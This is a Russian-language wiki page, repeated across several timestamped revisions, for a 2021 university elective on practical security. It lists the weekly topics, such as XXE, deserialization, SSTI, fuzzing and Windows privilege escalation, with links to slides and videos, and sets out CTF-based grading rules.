* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды] [https://youtu.be/p195JmRCvNs видео - часть 1] [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:28:37Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды] [https://youtu.be/p195JmRCvNs видео - часть 1] [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:27:39Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды] [https://youtu.be/p195JmRCvNs видео - часть 1] [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:25:29Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка] [https://youtu.be/p195JmRCvNs видео - часть 1] [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:24:48Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка] [https://youtu.be/p195JmRCvNs видео - часть 1] [видео - часть 2])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:24:05Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка] [https://youtu.be/p195JmRCvNs видео - часть 1])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:21:43Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:20:37Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

